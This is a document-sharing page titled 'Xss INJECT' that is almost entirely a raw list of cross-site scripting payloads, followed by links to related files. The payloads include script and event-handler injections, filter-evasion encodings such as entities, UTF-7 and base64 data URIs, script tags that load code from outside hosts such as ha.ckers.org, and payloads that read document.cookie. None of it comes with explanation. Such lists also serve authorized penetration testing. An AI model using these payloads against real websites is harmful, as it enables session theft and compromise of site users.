0% found this document useful (0 votes)

179 views10 pages

Xss INJECT

The document contains multiple examples of JavaScript code injected into HTML tags and attributes that could be used for cross-site scripting attacks. The examples leverage various techniques to execute alert popups and other JavaScript code through the injection of scripts tags, JavaScript URLs in image and iframe sources, HTML entity encoding, and UTF-7 encoding.

Uploaded by

Yulian Sani

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

179 views10 pages

Xss INJECT

Uploaded by

Yulian Sani

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 10

<script>alert(123);</script>

<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert("XSS")</script>
<script>alert("XSS");</script>
<script>alert('XSS')</script>
"><script>alert("XSS")</script>
<script>alert(/XSS")</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert(document&period;location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/
%00*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>
X</a
http://www.google<script .com>alert(document.location)</script
<a href=[]"
onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
</form><input type="date" onfocus="alert(1)">
<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script
/***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script
/***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)"
onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab
;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&T
ab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;
&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;
&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;
r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.
\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo
;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/
[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER
SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\"
HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-
binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE&
gt;
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
�scriptualert(EXSSE)�/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\
">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\0
03a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</STYLE><A
CLASS=XSS></A>
<STYLE
type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}<
/STYLE>

<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param
name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\"
implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss&g
t;XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG
SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javascript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-
com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>

<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-
7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" ''
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F
%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A
HREF=\"javascript:document.location='http://www.google.com/'\"
>XSS</A>
<A
HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XS
S</A>
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS
SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x7
4&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#00001
12&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039
&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,
83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCod
e(88,83,83))//--
></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83)
)</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
�script�alert(�XSS�)�/script�
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test"
formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')
()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-
use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</script>
"><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript
%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//';
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert('XSS')>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>

Vuln Hub
No ratings yet
Vuln Hub
1 page
Chapter 4
100% (2)
Chapter 4
50 pages
XSS
No ratings yet
XSS
10 pages
Xss Payload
No ratings yet
Xss Payload
12 pages
Xss Payloads
No ratings yet
Xss Payloads
12 pages
XSS Payloads
No ratings yet
XSS Payloads
21 pages
XSSDetection
No ratings yet
XSSDetection
4 pages
XSSalert Test
No ratings yet
XSSalert Test
4 pages
Wordlist XSS-2
No ratings yet
Wordlist XSS-2
3 pages
XSS Payloads Cheat Sheet
No ratings yet
XSS Payloads Cheat Sheet
10 pages
S
No ratings yet
S
9 pages
50 New Cross-Site Scripting (XSS) Vectors (100 in Total)
No ratings yet
50 New Cross-Site Scripting (XSS) Vectors (100 in Total)
5 pages
Untitled
No ratings yet
Untitled
4 pages
X Ss Payloads
No ratings yet
X Ss Payloads
33 pages
<img src=x>
No ratings yet
<img src=x>
2 pages
XSS (Cross Site Scripting) Cheat Sheet
No ratings yet
XSS (Cross Site Scripting) Cheat Sheet
19 pages
Short List of XSS Scripts For Testing
No ratings yet
Short List of XSS Scripts For Testing
4 pages
Cross Site Scripting
No ratings yet
Cross Site Scripting
8 pages
The Innerhtml Apocalypse: How Mxss Attacks Change Everything We Believed To Know So Far
No ratings yet
The Innerhtml Apocalypse: How Mxss Attacks Change Everything We Believed To Know So Far
51 pages
XSS Filter Evasion Cheat Sheet - OWASP
No ratings yet
XSS Filter Evasion Cheat Sheet - OWASP
44 pages
XSS Filter Evasion Cheat Sheet
No ratings yet
XSS Filter Evasion Cheat Sheet
16 pages
XSS Scripts
No ratings yet
XSS Scripts
1 page
Done by Alibek Sabraliyev and Yerezhepov Askhat CSSE-0902
No ratings yet
Done by Alibek Sabraliyev and Yerezhepov Askhat CSSE-0902
10 pages
XSS Rsnake
No ratings yet
XSS Rsnake
2 pages
WAF Bypass
No ratings yet
WAF Bypass
12 pages
1500
No ratings yet
1500
40 pages
Xss Evasion
No ratings yet
Xss Evasion
7 pages
Cross Site Scripting XSS Regex Bypass 1704538523
No ratings yet
Cross Site Scripting XSS Regex Bypass 1704538523
5 pages
Cheatsheet XSS Vectors
No ratings yet
Cheatsheet XSS Vectors
33 pages
DOM Based XSS and Proper Output Encoding
100% (1)
DOM Based XSS and Proper Output Encoding
35 pages
XSS - Advanced Techniques
No ratings yet
XSS - Advanced Techniques
30 pages
XSS - Part 1
No ratings yet
XSS - Part 1
5 pages
Xss Filter Evasion Cheatsheet
No ratings yet
Xss Filter Evasion Cheatsheet
32 pages
XSS Answers
No ratings yet
XSS Answers
7 pages
FALLSEM2019-20 ITE1002 ETH VL2019201002518 Reference Material II 26-Aug-2019 Stringmethods Example Code
No ratings yet
FALLSEM2019-20 ITE1002 ETH VL2019201002518 Reference Material II 26-Aug-2019 Stringmethods Example Code
1 page
XSS Filter Evasion Cheat Sheet - OWASP
No ratings yet
XSS Filter Evasion Cheat Sheet - OWASP
35 pages
XSS (Cross Site Scripting) Cheat Sheet Esp: For Filter Evasion
No ratings yet
XSS (Cross Site Scripting) Cheat Sheet Esp: For Filter Evasion
18 pages
OWASP LA The Last XSS Defense Talk Jim Manico 2018 08
No ratings yet
OWASP LA The Last XSS Defense Talk Jim Manico 2018 08
75 pages
XSS - Ultimate Beginner Guide
No ratings yet
XSS - Ultimate Beginner Guide
43 pages
Labreportofjs
No ratings yet
Labreportofjs
17 pages
Ultimate+XSS+Guide+ +slides
No ratings yet
Ultimate+XSS+Guide+ +slides
43 pages
Xss
No ratings yet
Xss
62 pages
XSS and Authorization
No ratings yet
XSS and Authorization
6 pages
XSS Payload Examples
No ratings yet
XSS Payload Examples
7 pages
XSS Notes
No ratings yet
XSS Notes
23 pages
Unraveling Some of The Mysteries Around DOM-based XSS
100% (1)
Unraveling Some of The Mysteries Around DOM-based XSS
36 pages
DOM-based XSS Attacks
No ratings yet
DOM-based XSS Attacks
8 pages
Web 1
No ratings yet
Web 1
10 pages
XSS Advance pAYLODS: /u /u /u /u /u /u /u /u /u
No ratings yet
XSS Advance pAYLODS: /u /u /u /u /u /u /u /u /u
4 pages
Inseguridad Informartica
No ratings yet
Inseguridad Informartica
9 pages
Assignment-10: Alert Box
No ratings yet
Assignment-10: Alert Box
6 pages
JS (Casestudy)
No ratings yet
JS (Casestudy)
21 pages
Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub
No ratings yet
Browser's XSS Filter Bypass Cheat Sheet Masatokinugawa - Filterbypass Wiki GitHub
20 pages
Examples
No ratings yet
Examples
66 pages
Advanced XSS 1700217269
No ratings yet
Advanced XSS 1700217269
45 pages
WE Lab 8
No ratings yet
WE Lab 8
13 pages
How To Find XSS in Bug Bounty Programs - A Step-by-Step Guide With Source Code Examples - by Shaikh Mi1nhaz - Freedium
No ratings yet
How To Find XSS in Bug Bounty Programs - A Step-by-Step Guide With Source Code Examples - by Shaikh Mi1nhaz - Freedium
9 pages
It 313 Internet Technologies and Web Design.. Dr. Brown
No ratings yet
It 313 Internet Technologies and Web Design.. Dr. Brown
5 pages
Xss 20
No ratings yet
Xss 20
3 pages
Khushboo File
No ratings yet
Khushboo File
16 pages
Sxss Test
No ratings yet
Sxss Test
4 pages
Altcoins and ICOs: Altcoins and ICOs Unveiled: Understanding and Profiting from Alternative Cryptocurrencies
From Everand
Altcoins and ICOs: Altcoins and ICOs Unveiled: Understanding and Profiting from Alternative Cryptocurrencies
Nathan Chambers
No ratings yet
Organizational Culture and Employee Performance in The Digital Era (Post-COVID-19) : Systematic Literature Review
No ratings yet
Organizational Culture and Employee Performance in The Digital Era (Post-COVID-19) : Systematic Literature Review
9 pages
Oracle Iplanet Web Server 7.0.X 7.0.27 Nss Unspecified Vulnerability
No ratings yet
Oracle Iplanet Web Server 7.0.X 7.0.27 Nss Unspecified Vulnerability
1 page
How To Use Port Knocking On Linu1
No ratings yet
How To Use Port Knocking On Linu1
1 page
New Router Checklist ISO 27001 PDF
No ratings yet
New Router Checklist ISO 27001 PDF
4 pages
META
No ratings yet
META
1 page
Synopsis: 79638 - MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (Uncredentialed Check)
No ratings yet
Synopsis: 79638 - MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution (2992611) (Uncredentialed Check)
3 pages
How To Use Port Knocking On Linux
No ratings yet
How To Use Port Knocking On Linux
1 page
Footprinting (Also Known As Reconnaissance) Is The Technique Used For Gathering Information About Computer
No ratings yet
Footprinting (Also Known As Reconnaissance) Is The Technique Used For Gathering Information About Computer
4 pages
IIS 5.1 Directory Authentication Bypass: Soroush Dalili
No ratings yet
